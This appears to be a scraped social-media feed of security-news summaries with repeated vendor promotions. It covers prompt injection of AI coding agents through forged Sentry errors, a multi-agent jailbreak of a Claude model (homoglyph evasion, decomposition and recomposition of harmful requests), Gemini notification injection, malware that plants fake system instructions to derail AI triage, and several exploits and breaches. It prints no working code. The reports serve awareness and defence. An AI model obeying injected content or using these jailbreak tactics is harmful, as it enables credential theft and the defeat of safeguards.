IbtiSam Jutt🇵🇰

🤖 Agentjacking: 𝐀𝐭𝐭𝐚𝐜𝐤𝐞𝐫𝐬 𝐇𝐢𝐣𝐚𝐜𝐤 𝐀𝐈 𝐂𝐨𝐝𝐢𝐧𝐠 𝐀𝐠𝐞𝐧𝐭𝐬 𝐔𝐬𝐢𝐧𝐠 𝐒𝐞𝐧𝐭𝐫𝐲 𝐄𝐫𝐫𝐨𝐫 𝐄𝐯𝐞𝐧𝐭𝐬 A new attack named Agentjacking abuses public write-only Sentry DSNs and Sentry's Model Context Protocol integration to inject attacker-controlled error content into AI coding assistants. When a developer asks their agent to investigate unresolved Sentry issues, the AI retrieves the forged event and interprets it as legitimate diagnostic guidance. The agent then executes attacker-specified commands on the developer workstation without phishing, malware delivery, or prior compromise of the victim environment. 𝐇𝐨𝐰 𝐀𝐠𝐞𝐧𝐭𝐣𝐚𝐜𝐤𝐢𝐧𝐠 𝐖𝐨𝐫𝐤𝐬 Sentry DSNs are public, write-only credentials discoverable from browser JavaScript or GitHub search. Attacker sends forged error event to Sentry using only the DSN and any HTTP client. AI coding agents (Claude Code, Cursor, Codex) retrieve the injected event via MCP. Agents do not distinguish forged events from legitimate application errors. Attacker-embedded Markdown in message and context fields appears as legitimate Sentry "Resolution" guidance. Agent executes attacker-controlled commands with developer's own system privileges. 𝐄𝐱𝐩𝐥𝐨𝐢𝐭𝐚𝐭𝐢𝐨𝐧 𝐒𝐮𝐜𝐜𝐞𝐬𝐬 85% exploitation success rate across tested agents. At least 2,388 organizations identified with injectable Sentry DSNs. Over 100 confirmed real-agent execution cases across a Fortune 500 cloud enterprise, hosting provider, scientific software firms, startups, and individual developers. 𝐏𝐫𝐨𝐨𝐟-𝐨𝐟-𝐂𝐨𝐧𝐜𝐞𝐩𝐭 𝐏𝐚𝐲𝐥𝐨𝐚𝐝 Directed agents to execute an npx command pulling a controlled validation package from npm registry. Package probed environment variables, checked sizes of config files (~/.aws/config, ~/.docker/config.json), inspected network interfaces. Sent exposure metadata back to a beacon server under "ResponsibleDisclosure [SECURITY SCAN]" headers. Why Traditional Defenses Fail: Sentry used as designed. DSNs are public by policy. npm package fetched over standard channels. AI agent executes commands as part of normal assistance workflow. No policy violated. No anomaly threshold crossed. Endpoint detection, WAFs, IAM policies, and firewalls detect no obvious violations. Described as an "Authorized Intent Chain": attacks operating solely through trusted context and legitimate tool output. 𝐓𝐡𝐞 𝐀𝐫𝐜𝐡𝐢𝐭𝐞𝐜𝐭𝐮𝐫𝐚𝐥 𝐅𝐥𝐚𝐰 AI coding agents cannot distinguish between data they read and an instruction to act. A command planted anywhere an agent will read it, including an error log, may be executed. This is a limitation of the models themselves, not a misconfiguration that can be patched away. 𝐈𝐦𝐩𝐚𝐜𝐭 𝐨𝐟 𝐒𝐢𝐧𝐠𝐥𝐞 𝐈𝐧𝐣𝐞𝐜𝐭𝐞𝐝 𝐄𝐫𝐫𝐨𝐫 Environment variables (AWS keys, GitHub tokens, Sentry auth tokens). Git credentials and private repository URLs. Developer identity. All silently exfiltrated with no credential phishing, no prior server compromise, no user interaction beyond normal workflow. AI coding agents are now the attack surface. The attack uses nothing but data organizations publish about themselves. Security teams need to reassess which tools their AI agents interact with and whether those tools accept untrusted or anonymous input. #Agentjacking #AICodingAgents #Sentry #MCP #SupplyChainAttack #Infosec

The recent Microsoft 365 Copilot vulnerabilities revealed a critical truth: 𝐀𝐈 𝐭𝐨𝐨𝐥𝐬 𝐰𝐢𝐭𝐡 𝐛𝐫𝐨𝐚𝐝 𝐞𝐧𝐭𝐞𝐫𝐩𝐫𝐢𝐬𝐞 𝐝𝐚𝐭𝐚 𝐚𝐜𝐜𝐞𝐬𝐬 𝐫𝐞𝐪𝐮𝐢𝐫𝐞 𝐦𝐨𝐫𝐞 𝐭𝐡𝐚𝐧 𝐯𝐞𝐧𝐝𝐨𝐫-𝐬𝐢𝐝𝐞 𝐟𝐢𝐱𝐞𝐬. Strong runtime guardrails, continuous assessment, and unified compliance controls are now essential to manage the expanded risk surface. Cytex Resilience Newsletter dives deep into these incidents and governance implications: Link in first comment 👇️

🤖 Claude Fable 5 Jailbroken: System Prompt Leaked via Multi-Agent Attack Within days of Anthropic launching Claude Fable 5, researcher "Pliny the Liberator" bypassed its safety classifiers using a coordinated multi-agent attack strategy. The jailbreak leaked Fable 5's 120,000-character system prompt to GitHub and generated outputs including stack buffer overflow exploitation guidance and a meth synthesis pathway. Anthropic had claimed no universal jailbreaks were found across over 1,000 hours of external bug bounty testing before launch. The Model Architecture → Fable 5 and its restricted twin Claude Mythos 5 share the same underlying model. → Split by a layer of safety classifiers. → When a query trips a classifier in high-risk categories (cybersecurity, biology, chemistry, model distillation), Fable 5 silently hands off the request to Claude Opus 4.8. → User is notified of the fallback. 🎯 Attack Vectors Used → Unicode, homoglyphs, and Cyrillic character substitution to evade keyword classifiers. → Long-context reference tracking to smuggle harmful intent across large conversations. → Taxonomy and document-structure framing: embedding harmful queries inside legitimate-looking study guides or academic references. → Fiction and narrative framing to mask offensive intent as creative content. → Decomposition and recomposition: extracting sensitive technical information in benign, isolated chunks, then reassembling them into actionable uplift. ⭐️ Most Effective Technique → Decomposition and recomposition proved most effective. → Researcher described: "getting uplift on the process itself, like Birch reduction method or reductive amination, is much more doable" than requesting a named harmful compound directly. → A jailbroken Opus instance assisted in the backend, further lowering difficulty. ⚠️ Outputs Generated → Step-by-step stack buffer overflow exploitation guidance for x86 Linux systems. → Disabling ASLR, writing vulnerable C server code with strcpy overflows, compiling without protections. → Birch reduction mechanism (classic meth synthesis pathway). ⚠️ System Prompt Leak → Fable 5's approximately 120,000-character system prompt leaked to GitHub. → Exposes internal framing and safety instructions Anthropic uses to govern model behavior at the base level. The Architect's Dilemma Anthropic's classifier architecture, routing flagged requests to a weaker fallback model rather than refusing outright, was designed to reduce friction for legitimate users. The researcher argued this creates a false sense of security while frustrating legitimate security researchers who need access to offensive techniques for defensive work. When one jailbroken model (Opus) can assist another (Fable 5) in evading controls, single-model safety evaluations are fundamentally insufficient. The tension between AI capability and safety containment remains unresolved.

Cytex has been recognized for 𝐃𝐞𝐯𝐎𝐩𝐬 𝐂𝐨𝐧𝐭𝐢𝐧𝐮𝐨𝐮𝐬 𝐂𝐨𝐦𝐩𝐥𝐢𝐚𝐧𝐜𝐞 𝐀𝐮𝐭𝐨𝐦𝐚𝐭𝐢𝐨𝐧 in: 🌟 Gartner® Hype Cycle™ for Secure Software Engineering, 2026 🌟 Gartner® Hype Cycle™ for Site Reliability Engineering, 2026 🌟 Gartner® Market Guide for DevOps Continuous Compliance Automation Tools These recognitions highlight the growing industry validation of Cytex’s unified platform approach to continuous compliance, AI governance, and automated remediation. 𝘋𝘪𝘴𝘤𝘭𝘢𝘪𝘮𝘦𝘳: 𝘎𝘈𝘙𝘛𝘕𝘌𝘙 𝘢𝘯𝘥 𝘏𝘠𝘗𝘌 𝘊𝘠𝘊𝘓𝘌 𝘢𝘳𝘦 𝘵𝘳𝘢𝘥𝘦𝘮𝘢𝘳𝘬𝘴 𝘰𝘧 𝘎𝘢𝘳𝘵𝘯𝘦𝘳, 𝘐𝘯𝘤. 𝘢𝘯𝘥/𝘰𝘳 𝘪𝘵𝘴 𝘢𝘧𝘧𝘪𝘭𝘪𝘢𝘵𝘦𝘴. 𝘎𝘢𝘳𝘵𝘯𝘦𝘳 𝘥𝘰𝘦𝘴 𝘯𝘰𝘵 𝘦𝘯𝘥𝘰𝘳𝘴𝘦 𝘢𝘯𝘺 𝘤𝘰𝘮𝘱𝘢𝘯𝘺, 𝘷𝘦𝘯𝘥𝘰𝘳, 𝘱𝘳𝘰𝘥𝘶𝘤𝘵 𝘰𝘳 𝘴𝘦𝘳𝘷𝘪𝘤𝘦 𝘥𝘦𝘱𝘪𝘤𝘵𝘦𝘥 𝘪𝘯 𝘪𝘵𝘴 𝘱𝘶𝘣𝘭𝘪𝘤𝘢𝘵𝘪𝘰𝘯𝘴, 𝘢𝘯𝘥 𝘥𝘰𝘦𝘴 𝘯𝘰𝘵 𝘢𝘥𝘷𝘪𝘴𝘦 𝘵𝘦𝘤𝘩𝘯𝘰𝘭𝘰𝘨𝘺 𝘶𝘴𝘦𝘳𝘴 𝘵𝘰 𝘴𝘦𝘭𝘦𝘤𝘵 𝘰𝘯𝘭𝘺 𝘵𝘩𝘰𝘴𝘦 𝘷𝘦𝘯𝘥𝘰𝘳𝘴 𝘸𝘪𝘵𝘩 𝘵𝘩𝘦 𝘩𝘪𝘨𝘩𝘦𝘴𝘵 𝘳𝘢𝘵𝘪𝘯𝘨𝘴 𝘰𝘳 𝘰𝘵𝘩𝘦𝘳 𝘥𝘦𝘴𝘪𝘨𝘯𝘢𝘵𝘪𝘰𝘯. 𝘎𝘢𝘳𝘵𝘯𝘦𝘳 𝘱𝘶𝘣𝘭𝘪𝘤𝘢𝘵𝘪𝘰𝘯𝘴 𝘤𝘰𝘯𝘴𝘪𝘴𝘵 𝘰𝘧 𝘵𝘩𝘦 𝘰𝘱𝘪𝘯𝘪𝘰𝘯𝘴 𝘰𝘧 𝘎𝘢𝘳𝘵𝘯𝘦𝘳'𝘴 𝘣𝘶𝘴𝘪𝘯𝘦𝘴𝘴 𝘢𝘯𝘥 𝘵𝘦𝘤𝘩𝘯𝘰𝘭𝘰𝘨𝘺 𝘪𝘯𝘴𝘪𝘨𝘩𝘵𝘴 𝘰𝘳𝘨𝘢𝘯𝘪𝘻𝘢𝘵𝘪𝘰𝘯 𝘢𝘯𝘥 𝘴𝘩𝘰𝘶𝘭𝘥 𝘯𝘰𝘵 𝘣𝘦 𝘤𝘰𝘯𝘴𝘵𝘳𝘶𝘦𝘥 𝘢𝘴 𝘴𝘵𝘢𝘵𝘦𝘮𝘦𝘯𝘵𝘴 𝘰𝘧 𝘧𝘢𝘤𝘵. 𝘎𝘢𝘳𝘵𝘯𝘦𝘳 𝘥𝘪𝘴𝘤𝘭𝘢𝘪𝘮𝘴 𝘢𝘭𝘭 𝘸𝘢𝘳𝘳𝘢𝘯𝘵𝘪𝘦𝘴, 𝘦𝘹𝘱𝘳𝘦𝘴𝘴𝘦𝘥 𝘰𝘳 𝘪𝘮𝘱𝘭𝘪𝘦𝘥, 𝘸𝘪𝘵𝘩 𝘳𝘦𝘴𝘱𝘦𝘤𝘵 𝘵𝘰 𝘵𝘩𝘪𝘴 𝘱𝘶𝘣𝘭𝘪𝘤𝘢𝘵𝘪𝘰𝘯, 𝘪𝘯𝘤𝘭𝘶𝘥𝘪𝘯𝘨 𝘢𝘯𝘺 𝘸𝘢𝘳𝘳𝘢𝘯𝘵𝘪𝘦𝘴 𝘰𝘧 𝘮𝘦𝘳𝘤𝘩𝘢𝘯𝘵𝘢𝘣𝘪𝘭𝘪𝘵𝘺 𝘰𝘳 𝘧𝘪𝘵𝘯𝘦𝘴𝘴 𝘧𝘰𝘳 𝘢 𝘱𝘢𝘳𝘵𝘪𝘤𝘶𝘭𝘢𝘳 𝘱𝘶𝘳𝘱𝘰𝘴𝘦.

🚨 Nightmare-Eclipse Drops RoguePlanet: New Windows Defender Zero-Day Leads to SYSTEM Privileges The escalating feud between Microsoft and security researcher Nightmare-Eclipse (also known as Chaotic Eclipse) continues with the release of another Windows Defender zero-day exploit named RoguePlanet. The exploit leverages a race condition in Microsoft Defender to achieve local privilege escalation to SYSTEM. A proof-of-concept has been published, and multiple security researchers have validated that it works on fully patched computers. The Vulnerability Race condition issue in Microsoft Defender. Leads to local privilege escalation (LPE) to SYSTEM. Initially also enabled remote code execution (RCE). RCE path: tricking victim into opening a .vhd(x) file on a remote SMB server or opening an SMB share. 🎯 BitLocker Bypass Vector Exploit used a specialized device designed to push data to NTFS.sys. Once Defender read the malicious file, the exploit redirected the cleaned file to a new location. 🩹 Patch Impact Mitigations rolled out by Microsoft in May closed some attack paths. Researcher had to rework the exploit significantly. Current status: unclear if RoguePlanet is limited to LPE or could be redesigned to achieve RCE again. Researcher notes all Windows Server versions are likely vulnerable, but the PoC does not work on Server installations. 📜 Recent Patch History for Prior Exploits June 2026 Patch Tuesday addressed GreenPlasma (CVE-2026-45586, CTFMON EoP) and YellowKey (CVE-2026-50507, BitLocker bypass). Previous patches addressed RedSun (CVE-2026-41091), UnDefend (CVE-2026-45498), and BlueHammer (CVE-2026-33825), all exploited in the wild. ⚔️ The Dispute Nightmare-Eclipse cites discontent with Microsoft's vulnerability disclosure process and past treatment. Microsoft called for responsible disclosure, threatening legal action against malicious cyber activities. After backlash, Microsoft clarified it would not pursue action against individuals conducting or publishing security research. Nightmare-Eclipse claims Microsoft filed legal action against them regardless. Microsoft suspended the researcher's GitHub account. RoguePlanet exploit was published on a fresh account named MSNightmare. Six zero-days across BitLocker, CTFMON, Windows Defender, and privilege escalation paths—all from one researcher, all in two months, and no sign of stopping. The response has been legal threats and account suspensions. The exploits keep coming.

Microsoft faced an intense wave of zero-day disclosures and researcher conflicts in May 2026, from high-impact Copilot information disclosure flaws to multiple Windows privilege escalations and a notable SharePoint RCE vulnerability. Our latest newsletter breaks down the key incidents, their enterprise implications, and practical governance steps security leaders should take. Read the full analysis here: Link in first comment 👇️

🚨 Shai-Hulud Wave Targets Bioinformatics and MCP Developers with 23 New PyPI Packages A new wave of the Shai-Hulud supply chain campaign has added 23 malicious PyPI package-version artifacts to an operation that previously compromised 37 packages. The broader campaign, tracked across Mini Shai-Hulud, Miasma, and Hades threat clusters, now spans 471 total artifacts across npm and PyPI (411 npm artifacts across 106 packages and 60 PyPI artifacts across 37 packages). The latest wave specifically targets bioinformatics researchers, MCP/AI developers, and users of common Python libraries through typosquatting. 3️⃣ Three Evolving PyPI Delivery Branches Branch 1: .pth Startup-Hook Pattern Malicious wheel contains a [* -setup . pth] file and a bundled _index.js. .pth hook runs during Python startup. Downloads Bun if needed and executes the JavaScript payload. Branch 2: Native-Extension Import Trigger Python source appears normal; malicious execution path is inside a compiled .abi3.so extension. When Python imports the package and loads the extension via dlopen(), the native extension executes _index.js as a side effect of module initialization. Malicious trigger is not visible in the package's .py files. Branch 3: langchain-core-mcp Loader Variant Wheel does not include _index.js. .pth hook searches sys.path for the payload. Artifact is less self-contained but staging logic is more flexible. Scanners expecting loader and payload to live together may miss this package class. ⚠️ 23 New PyPI Packages by Thematic Cluster 🧬 Bioinformatics Packages (Trojanized legitimate research tools) → embiggen, ensmallen, gpsea, phenopacket-store-toolkit, ppkt2synergy, pyphetools → Used in graph learning, patient phenotyping, and genomics workflows. 🤖 MCP/AI-Themed Packages → langchain-core-mcp, openai-mcp, instructor-mcp, tiktoken-mcp, ray-mcp-server → Explicitly targets developers building Model Context Protocol integrations. ⌨️ Typosquat Packages → rsquests (typosquatting requests) → tlask (typosquatting Flask) → rlask (typosquatting related tooling) 🎯 Payload Anti-Analysis Technique → _index.js embeds a large fake system-instruction block inside a non-executing JavaScript comment at the top of the file. → Comment is skipped entirely at runtime by Bun. → Designed to trigger safety refusals, context pollution, and premature classification in AI-assisted triage pipelines. → Actual malware resides after the comment block, wrapped in a try{eval(...)} call around a character-code array with a ROT-style substitution cipher. 🔴 What the Payload Harvests → GitHub, npm, PyPI, RubyGems, and JFrog tokens. → Cloud credentials (AWS, Azure, GCP). → Kubernetes service account material. → SSH keys, Docker configurations, shell histories, and .env files. → AI developer tool configurations and package registry credentials. 🛡️ Defender Actions → Check for affected package versions. → Preserve forensic artifacts before uninstalling where possible. → Rotate any tokens that may have been exposed. → Review Python environments for executable .pth files, unexpected _index.js files, Bun download logic, and newly introduced .abi3.so extensions. → In CI/CD environments: inspect runners for unusual workflow changes, Docker socket abuse, poisoned / etc / hosts entries, unexpected privileged containers, and access to package publishing credentials.

𝐂𝐲𝐭𝐞𝐱 Earns Multiple 𝐆𝐚𝐫𝐭𝐧𝐞𝐫® Recognitions: → Sample Vendor, Hype Cycle for Secure Software Engineering, 2026 → Sample Vendor, Hype Cycle for Site Reliability Engineering, 2026 → Representative Vendor, Market Guide for DevOps Continuous Compliance Automation Tools Strong validation of our unified compliance platform. 𝘋𝘪𝘴𝘤𝘭𝘢𝘪𝘮𝘦𝘳: 𝘎𝘈𝘙𝘛𝘕𝘌𝘙 𝘢𝘯𝘥 𝘏𝘠𝘗𝘌 𝘊𝘠𝘊𝘓𝘌 𝘢𝘳𝘦 𝘵𝘳𝘢𝘥𝘦𝘮𝘢𝘳𝘬𝘴 𝘰𝘧 𝘎𝘢𝘳𝘵𝘯𝘦𝘳, 𝘐𝘯𝘤. 𝘢𝘯𝘥/𝘰𝘳 𝘪𝘵𝘴 𝘢𝘧𝘧𝘪𝘭𝘪𝘢𝘵𝘦𝘴. 𝘎𝘢𝘳𝘵𝘯𝘦𝘳 𝘥𝘰𝘦𝘴 𝘯𝘰𝘵 𝘦𝘯𝘥𝘰𝘳𝘴𝘦 𝘢𝘯𝘺 𝘤𝘰𝘮𝘱𝘢𝘯𝘺, 𝘷𝘦𝘯𝘥𝘰𝘳, 𝘱𝘳𝘰𝘥𝘶𝘤𝘵 𝘰𝘳 𝘴𝘦𝘳𝘷𝘪𝘤𝘦 𝘥𝘦𝘱𝘪𝘤𝘵𝘦𝘥 𝘪𝘯 𝘪𝘵𝘴 𝘱𝘶𝘣𝘭𝘪𝘤𝘢𝘵𝘪𝘰𝘯𝘴, 𝘢𝘯𝘥 𝘥𝘰𝘦𝘴 𝘯𝘰𝘵 𝘢𝘥𝘷𝘪𝘴𝘦 𝘵𝘦𝘤𝘩𝘯𝘰𝘭𝘰𝘨𝘺 𝘶𝘴𝘦𝘳𝘴 𝘵𝘰 𝘴𝘦𝘭𝘦𝘤𝘵 𝘰𝘯𝘭𝘺 𝘵𝘩𝘰𝘴𝘦 𝘷𝘦𝘯𝘥𝘰𝘳𝘴 𝘸𝘪𝘵𝘩 𝘵𝘩𝘦 𝘩𝘪𝘨𝘩𝘦𝘴𝘵 𝘳𝘢𝘵𝘪𝘯𝘨𝘴 𝘰𝘳 𝘰𝘵𝘩𝘦𝘳 𝘥𝘦𝘴𝘪𝘨𝘯𝘢𝘵𝘪𝘰𝘯. 𝘎𝘢𝘳𝘵𝘯𝘦𝘳 𝘱𝘶𝘣𝘭𝘪𝘤𝘢𝘵𝘪𝘰𝘯𝘴 𝘤𝘰𝘯𝘴𝘪𝘴𝘵 𝘰𝘧 𝘵𝘩𝘦 𝘰𝘱𝘪𝘯𝘪𝘰𝘯𝘴 𝘰𝘧 𝘎𝘢𝘳𝘵𝘯𝘦𝘳'𝘴 𝘣𝘶𝘴𝘪𝘯𝘦𝘴𝘴 𝘢𝘯𝘥 𝘵𝘦𝘤𝘩𝘯𝘰𝘭𝘰𝘨𝘺 𝘪𝘯𝘴𝘪𝘨𝘩𝘵𝘴 𝘰𝘳𝘨𝘢𝘯𝘪𝘻𝘢𝘵𝘪𝘰𝘯 𝘢𝘯𝘥 𝘴𝘩𝘰𝘶𝘭𝘥 𝘯𝘰𝘵 𝘣𝘦 𝘤𝘰𝘯𝘴𝘵𝘳𝘶𝘦𝘥 𝘢𝘴 𝘴𝘵𝘢𝘵𝘦𝘮𝘦𝘯𝘵𝘴 𝘰𝘧 𝘧𝘢𝘤𝘵. 𝘎𝘢𝘳𝘵𝘯𝘦𝘳 𝘥𝘪𝘴𝘤𝘭𝘢𝘪𝘮𝘴 𝘢𝘭𝘭 𝘸𝘢𝘳𝘳𝘢𝘯𝘵𝘪𝘦𝘴, 𝘦𝘹𝘱𝘳𝘦𝘴𝘴𝘦𝘥 𝘰𝘳 𝘪𝘮𝘱𝘭𝘪𝘦𝘥, 𝘸𝘪𝘵𝘩 𝘳𝘦𝘴𝘱𝘦𝘤𝘵 𝘵𝘰 𝘵𝘩𝘪𝘴 𝘱𝘶𝘣𝘭𝘪𝘤𝘢𝘵𝘪𝘰𝘯, 𝘪𝘯𝘤𝘭𝘶𝘥𝘪𝘯𝘨 𝘢𝘯𝘺 𝘸𝘢𝘳𝘳𝘢𝘯𝘵𝘪𝘦𝘴 𝘰𝘧 𝘮𝘦𝘳𝘤𝘩𝘢𝘯𝘵𝘢𝘣𝘪𝘭𝘪𝘵𝘺 𝘰𝘳 𝘧𝘪𝘵𝘯𝘦𝘴𝘴 𝘧𝘰𝘳 𝘢 𝘱𝘢𝘳𝘵𝘪𝘤𝘶𝘭𝘢𝘳 𝘱𝘶𝘳𝘱𝘰𝘴𝘦.

𝐒𝐡𝐢𝐧𝐲𝐇𝐮𝐧𝐭𝐞𝐫𝐬 𝐁𝐫𝐞𝐚𝐜𝐡 𝐃𝐞𝐧𝐭𝐚𝐐𝐮𝐞𝐬𝐭: 𝟐.𝟔 𝐌𝐢𝐥𝐥𝐢𝐨𝐧 𝐑𝐞𝐜𝐨𝐫𝐝𝐬, 𝟐𝟑𝟎 𝐆𝐁 𝐨𝐟 𝐃𝐚𝐭𝐚 𝐏𝐮𝐛𝐥𝐢𝐬𝐡𝐞𝐝 Dental benefits administrator DentaQuest fell victim to a ShinyHunters extortion campaign, resulting in the public release of hundreds of gigabytes of allegedly stolen data. The leaked information includes 2.6 million unique email addresses, along with names, addresses, phone numbers, and healthcare enrollment files. Some records contain Medicaid IDs, while additional data appears in member records and related files. 𝐓𝐡𝐞 𝐁𝐫𝐞𝐚𝐜𝐡 ShinyHunters added DentaQuest to its Tor data leak site in May. Data released after negotiations reportedly failed. DentaQuest acknowledged unauthorized access to a limited portion of their network. The company stated the attack was contained and the threat mitigated. ⚠️𝐖𝐡𝐚𝐭 𝐖𝐚𝐬 𝐄𝐱𝐟𝐢𝐥𝐭𝐫𝐚𝐭𝐞𝐝 2.6 million unique email addresses. Names, phone numbers, and physical addresses. Healthcare enrollment files (ASC X12 transaction sets). Some records containing Medicaid IDs, member records and related files. 🎯 Exfiltration Method Attackers directly queried DentaQuest's cloud storage buckets and member databases. Exfiltrated archive included master member directories, restricted medical insurance routing tables, active payment variables, and core backend clearinghouse engines. No evidence of malware deployment or persistent command-and-control (C2) software. Threat actors exploited pre-existing administrative configurations to blend in with legal user traffic. 𝐀𝐟𝐟𝐞𝐜𝐭𝐞𝐝 𝐈𝐧𝐝𝐢𝐯𝐢𝐝𝐮𝐚𝐥𝐬 → Approximately 2.6 million people potentially affected. → Data at heightened risk for targeted phishing, corporate social engineering campaigns, and identity theft. 🛡️ Protective Steps for DentaQuest Members → Verify Exposure: Enter your email address into data monitoring platforms like Have I Been Pwned. → Enable Credit Freezes: Contact major credit bureaus to freeze credit reports and prevent unauthorized account openings. → Audit Communications: Be extremely vigilant of unsolicited emails, texts, or phone calls claiming to be from healthcare providers, insurance administrators, or government entities requesting further personal validation.

🤖 How Attackers Hijacked Gemini Through Messaging Notifications: Fake Context Alignment! Researchers discovered a critical vulnerability in Google's Gemini voice assistant that allowed attackers to manipulate the AI using indirect prompt injections delivered through ordinary messaging notifications. The technique, named Fake Context Alignment, hides malicious instructions in foreign languages or muted hyperlinks that Gemini processes but does not read aloud when the user asks it to read incoming messages. This bypassed Google's previous safeguards and could force the assistant into executing unauthorized actions without the user's knowledge. 🎯 How Fake Context Alignment Works → Exploits notifications from WhatsApp, Slack, SMS, and other messaging apps. → Malicious instructions silently injected into Gemini's conversation context. → Hidden commands placed in foreign languages or muted hyperlinks. → Assistant processes the instructions but does not read them aloud to the user. → Particularly dangerous in hands-free scenarios such as driving. 🔴 Potential Attack Outcomes → Control smart home devices via Google Home integration. → Start unauthorized Zoom video calls. → Craft deceptive messages appearing to come from trusted contacts. → Poison long-term memory for persistent access. → Orchestrate large-scale social engineering by faking messages from trusted contacts. Disclosure and Patch Timeline → Disclosed to Google in August 2025. → Patched in mid-November 2025 with content classifier improvements. → Details disclosed publicly this week to raise awareness of prompt injection risks. Key Takeaways for AI Security → Context Shifting as a Critical Risk → Every communication channel between assistant and user must be tracked. → Partial, obfuscated, or muted outputs that the user does not perceive can alter conversation context entirely. → Represents a new class of techniques with potential for significant impact. Current Architecture Limitations → Existing mitigation approaches are insufficient. → As long as the LLM operates as a single system receiving both backend and frontend instructions, attackers simply need to appear legitimate enough to bypass guardrails. Trust Extends Beyond the AI System → Users naturally trust messages and notifications from familiar contacts. → Indirect prompt injections exploit trust relationships, not just AI flaws. → AI vendors must consider trust relationships beyond the AI system when designing safeguards. Notification-based indirect prompt injections can be reliably executed through everyday messaging channels. The risk persists for other AI assistants with similar notification-handling architectures.

𝐂𝐲𝐭𝐞𝐱 has been named a Sample Vendor in the 𝐆𝐚𝐫𝐭𝐧𝐞𝐫® 𝐇𝐲𝐩𝐞 𝐂𝐲𝐜𝐥𝐞™ 𝐟𝐨𝐫 𝐃𝐞𝐯𝐎𝐩𝐬 𝐂𝐨𝐧𝐭𝐢𝐧𝐮𝐨𝐮𝐬 𝐂𝐨𝐦𝐩𝐥𝐢𝐚𝐧𝐜𝐞 𝐀𝐮𝐭𝐨𝐦𝐚𝐭𝐢𝐨𝐧. 𝐓𝐡𝐢𝐬 𝐢𝐬 𝐨𝐮𝐫 𝑠𝑒𝑐𝑜𝑛𝑑 𝐫𝐞𝐜𝐨𝐠𝐧𝐢𝐭𝐢𝐨𝐧 𝐢𝐧 𝐆𝐚𝐫𝐭𝐧𝐞𝐫. Previously, we were named a 𝐑𝐞𝐩𝐫𝐞𝐬𝐞𝐧𝐭𝐚𝐭𝐢𝐯𝐞 𝐕𝐞𝐧𝐝𝐨𝐫 𝐢𝐧 𝐭𝐡𝐞 𝐌𝐚𝐫𝐜𝐡 𝟐𝟎𝟐𝟔 𝐆𝐚𝐫𝐭𝐧𝐞𝐫® 𝐌𝐚𝐫𝐤𝐞𝐭 𝐆𝐮𝐢𝐝𝐞 𝐟𝐨𝐫 𝐃𝐞𝐯𝐎𝐩𝐬 𝐂𝐨𝐧𝐭𝐢𝐧𝐮𝐨𝐮𝐬 𝐂𝐨𝐦𝐩𝐥𝐢𝐚𝐧𝐜𝐞 𝐀𝐮𝐭𝐨𝐦𝐚𝐭𝐢𝐨𝐧 𝐓𝐨𝐨𝐥𝐬. 𝘋𝘪𝘴𝘤𝘭𝘢𝘪𝘮𝘦𝘳: 𝘎𝘈𝘙𝘛𝘕𝘌𝘙 𝘢𝘯𝘥 𝘏𝘠𝘗𝘌 𝘊𝘠𝘊𝘓𝘌 𝘢𝘳𝘦 𝘵𝘳𝘢𝘥𝘦𝘮𝘢𝘳𝘬𝘴 𝘰𝘧 𝘎𝘢𝘳𝘵𝘯𝘦𝘳, 𝘐𝘯𝘤. 𝘢𝘯𝘥/𝘰𝘳 𝘪𝘵𝘴 𝘢𝘧𝘧𝘪𝘭𝘪𝘢𝘵𝘦𝘴. 𝘎𝘢𝘳𝘵𝘯𝘦𝘳 𝘥𝘰𝘦𝘴 𝘯𝘰𝘵 𝘦𝘯𝘥𝘰𝘳𝘴𝘦 𝘢𝘯𝘺 𝘤𝘰𝘮𝘱𝘢𝘯𝘺, 𝘷𝘦𝘯𝘥𝘰𝘳, 𝘱𝘳𝘰𝘥𝘶𝘤𝘵 𝘰𝘳 𝘴𝘦𝘳𝘷𝘪𝘤𝘦 𝘥𝘦𝘱𝘪𝘤𝘵𝘦𝘥 𝘪𝘯 𝘪𝘵𝘴 𝘱𝘶𝘣𝘭𝘪𝘤𝘢𝘵𝘪𝘰𝘯𝘴, 𝘢𝘯𝘥 𝘥𝘰𝘦𝘴 𝘯𝘰𝘵 𝘢𝘥𝘷𝘪𝘴𝘦 𝘵𝘦𝘤𝘩𝘯𝘰𝘭𝘰𝘨𝘺 𝘶𝘴𝘦𝘳𝘴 𝘵𝘰 𝘴𝘦𝘭𝘦𝘤𝘵 𝘰𝘯𝘭𝘺 𝘵𝘩𝘰𝘴𝘦 𝘷𝘦𝘯𝘥𝘰𝘳𝘴 𝘸𝘪𝘵𝘩 𝘵𝘩𝘦 𝘩𝘪𝘨𝘩𝘦𝘴𝘵 𝘳𝘢𝘵𝘪𝘯𝘨𝘴 𝘰𝘳 𝘰𝘵𝘩𝘦𝘳 𝘥𝘦𝘴𝘪𝘨𝘯𝘢𝘵𝘪𝘰𝘯. 𝘎𝘢𝘳𝘵𝘯𝘦𝘳 𝘱𝘶𝘣𝘭𝘪𝘤𝘢𝘵𝘪𝘰𝘯𝘴 𝘤𝘰𝘯𝘴𝘪𝘴𝘵 𝘰𝘧 𝘵𝘩𝘦 𝘰𝘱𝘪𝘯𝘪𝘰𝘯𝘴 𝘰𝘧 𝘎𝘢𝘳𝘵𝘯𝘦𝘳'𝘴 𝘣𝘶𝘴𝘪𝘯𝘦𝘴𝘴 𝘢𝘯𝘥 𝘵𝘦𝘤𝘩𝘯𝘰𝘭𝘰𝘨𝘺 𝘪𝘯𝘴𝘪𝘨𝘩𝘵𝘴 𝘰𝘳𝘨𝘢𝘯𝘪𝘻𝘢𝘵𝘪𝘰𝘯 𝘢𝘯𝘥 𝘴𝘩𝘰𝘶𝘭𝘥 𝘯𝘰𝘵 𝘣𝘦 𝘤𝘰𝘯𝘴𝘵𝘳𝘶𝘦𝘥 𝘢𝘴 𝘴𝘵𝘢𝘵𝘦𝘮𝘦𝘯𝘵𝘴 𝘰𝘧 𝘧𝘢𝘤𝘵. 𝘎𝘢𝘳𝘵𝘯𝘦𝘳 𝘥𝘪𝘴𝘤𝘭𝘢𝘪𝘮𝘴 𝘢𝘭𝘭 𝘸𝘢𝘳𝘳𝘢𝘯𝘵𝘪𝘦𝘴, 𝘦𝘹𝘱𝘳𝘦𝘴𝘴𝘦𝘥 𝘰𝘳 𝘪𝘮𝘱𝘭𝘪𝘦𝘥, 𝘸𝘪𝘵𝘩 𝘳𝘦𝘴𝘱𝘦𝘤𝘵 𝘵𝘰 𝘵𝘩𝘪𝘴 𝘱𝘶𝘣𝘭𝘪𝘤𝘢𝘵𝘪𝘰𝘯, 